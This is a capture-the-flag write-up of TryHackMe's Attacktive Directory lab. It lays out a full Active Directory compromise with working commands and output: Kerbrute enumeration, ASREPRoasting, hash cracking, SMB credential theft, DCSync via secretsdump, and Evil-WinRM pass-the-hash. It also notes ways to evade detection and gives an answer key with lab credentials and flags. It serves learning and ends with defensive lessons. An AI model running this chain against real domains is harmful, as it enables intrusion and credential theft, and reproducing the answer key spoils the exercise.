Back to CTF Writeups

Attacktive Directory — TryHackMe CTF

Full Active Directory compromise chain: Kerbrute user enum → ASREPRoasting → hash crack → SMB credential pivot → DCSync via Impacket → Pass-the-Hash with Evil-WinRM. Three flags captured. Full domain compromise from zero credentials.

TryHackMeMediumApr 20260xb0rn3 | oxbv1

Overview

A Windows Server Active Directory target on the domain spookysec.local (NetBIOS: THM-AD). The attack starts with zero credentials — Kerbrute enumerates valid domain users, ASREPRoasting extracts a crackable Kerberos hash for a service account with pre-auth disabled, SMB enumeration with those credentials recovers base64-encoded backup account credentials, and DCSync via Impacket's secretsdump.py dumps the Administrator NTLM hash for a final Pass-the-Hash login via Evil-WinRM.

Nmap → Kerberos/LDAP/SMB enum → enum4linux (NetBIOS: THM-AD) → Kerbrute userenum → valid users: svc-admin, backup, administrator... → GetNPUsers.py → svc-admin ASREPRoast hash (etype 23) → hashcat -m 18200 → management2005 → smbclient -L → 6 shares → backup share → backup_credentials.txt → base64 decode → backup@spookysec.local:backup2517860 → secretsdump.py -just-dc (DRSUAPI) → Administrator NTLM hash → evil-winrm -H 0e0363213e37b94221497260b0bcb4fc → DOMAIN ADMIN

Reconnaissance

PortServiceSignificance
53/tcpDNS (Simple DNS Plus)Domain: spookysec.local
88/tcpKerberosASREPRoast / Kerberoast target
139/tcpNetBIOSenum4linux → THM-AD
389/tcpLDAPDomain enumeration
445/tcpSMBShare enum + credential pivot
3268/tcpLDAP Global CatalogForest-wide queries
3389/tcpRDPCN: AttacktiveDirectory.spookysec.local
5985/tcpWinRMEvil-WinRM target

SMB / NetBIOS Enumeration

enum4linux -U -S TARGET
# NetBIOS-Domain Name: THM-AD
# Domain: spookysec.local  |  TLD: .local (non-standard / invalid for public DNS)

Step 1 — User Enumeration via Kerbrute

Kerbrute performs username enumeration by sending Kerberos AS-REQ packets for each candidate username and checking whether the DC responds with a PRINCIPAL UNKNOWN error or something else. This is silent — it generates no Windows logon failures and bypasses most SIEM alerting rules tuned for LDAP/SMB brute force.

kerbrute userenum --dc TARGET --domain spookysec.local userlist.txt

# VALID USERNAME: james@spookysec.local
# VALID USERNAME: svc-admin@spookysec.local
# VALID USERNAME: robin@spookysec.local
# VALID USERNAME: darkstar@spookysec.local
# VALID USERNAME: administrator@spookysec.local
# VALID USERNAME: backup@spookysec.local
# VALID USERNAME: paradox@spookysec.local

Two accounts stand out immediately: svc-admin (service account — likely has pre-auth disabled for legacy compatibility) and backup (DC backup account — often has elevated replication rights).

Step 2 — ASREPRoasting

When a domain account has "Do not require Kerberos preauthentication" set, anyone can request a TGT from the DC for that user without knowing the password. The DC hands back an AS-REP encrypted with the user's NTLM hash — which can be cracked offline. svc-admin has this flag set.

python3 GetNPUsers.py spookysec.local/ \
    -usersfile users.txt -no-pass \
    -dc-ip TARGET -format hashcat

# $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:<hash>
# Hash type: Kerberos 5 AS-REP etype 23 → hashcat mode 18200

Why Kerberos Pre-Auth Matters

Pre-authentication forces the client to prove knowledge of the password before the AS-REP is issued. Without it, the KDC encrypts a session key with the account's password hash and ships it to anyone who asks — turning offline hash cracking into a trivially exploitable primitive. Any service account or legacy app that requires this flag disabled is an ASREPRoast target.

Step 3 — Hash Cracking

# hashcat (GPU)
hashcat -m 18200 hash.txt passwordlist.txt --force

# john (CPU)
john --format=krb5asrep --wordlist=passwordlist.txt hash.txt
svc-admin password: management2005

Step 4 — SMB Enumeration & Credential Pivot

smbclient -L //TARGET -U 'svc-admin%management2005'
# → 6 shares: ADMIN$, C$, IPC$, NETLOGON, SYSVOL, backup

smbclient //TARGET/backup -U 'svc-admin%management2005' \
    -c 'get backup_credentials.txt'

cat backup_credentials.txt
# YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

echo 'YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw' | base64 -d
# backup@spookysec.local:backup2517860
svc-admin flag: TryHackMe{K3rb3r0s_Pr3_4uth}
backup flag: TryHackMe{B4ckM3UpSc0tty!}

Step 5 — DCSync via secretsdump.py

The backup account holds Replicating Directory Changes permissions — the same rights used by legitimate Domain Controllers to sync AD data. Impacket's secretsdump.py abuses these rights to perform a DCSync attack: it impersonates a DC requesting replication and receives all NTLM hashes from the domain controller over the DRSUAPI protocol. No code runs on the target. No files are written to disk.

python3 secretsdump.py \
    -just-dc spookysec.local/backup:backup2517860@TARGET

# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435...::0e0363213e37b94221497260b0bcb4fc:::
# svc-admin:1103:aad3b435...::fc0f1e5...:::
# backup:1118:aad3b435...::19feb5d...:::

DRSUAPI — No Touch, No Trace

DCSync via DRSUAPI is the preferred credential dumping method in modern red team ops. Unlike Mimikatz LSASS dumping, it requires no code on the DC, no AV evasion, and generates only legitimate-looking replication traffic. Defenders need to monitor for non-DC machines making GetNCChanges RPC calls — most default SIEM configurations miss this entirely.

Step 6 — Pass-the-Hash via Evil-WinRM

With the Administrator NTLM hash, there's no need to crack it. Pass-the-Hash authenticates directly using the hash as the credential material — WinRM accepts it via the -H flag:

evil-winrm -i TARGET -u Administrator \
    -H '0e0363213e37b94221497260b0bcb4fc'

# Evil-WinRM shell v3.x
# *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
# spookysec\administrator
Administrator flag: TryHackMe{4ctiveD1rectoryM4st3r}

Full Answer Reference

QuestionAnswer
Tool to enumerate port 139/445enum4linux
NetBIOS-Domain NameTHM-AD
Invalid TLD for AD domain.local
Kerbrute command for user enumuserenum
ASREPRoastable usersvc-admin
Kerberos hash typeKerberos 5 AS-REP etype 23
Hashcat mode18200
svc-admin passwordmanagement2005
SMB share mapping utilitysmbclient
Option to list shares-L
Number of remote shares6
Accessible share with text filebackup
File content (decoded)backup@spookysec.local:backup2517860
Method to dump NTDS.DITDRSUAPI
Administrator NTLM hash0e0363213e37b94221497260b0bcb4fc
Attack using hash without passwordPass the Hash
Evil-WinRM option for hash-H

Lessons Learned

  1. ASREPRoasting requires zero credentials. Any service account with pre-auth disabled is a publicly available offline cracking target. Audit with Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} and enforce pre-auth on all accounts.
  2. Sensitive files in SMB shares are goldmines. The backup_credentials.txt in plaintext (even base64-encoded) is an instant pivot. Shares should be audited regularly — least privilege on all.
  3. DCSync requires only replication rights, not DA. The backup account had dangerous permissions without being Administrator. Monitor non-DC accounts for DS-Replication-Get-Changes-All rights via BloodHound or PowerView.
  4. Pass-the-Hash makes cracking optional. NTLM hashes are usable as-is for lateral movement across Windows networks. Enforcing Protected Users group membership and Credential Guard blocks this attack vector.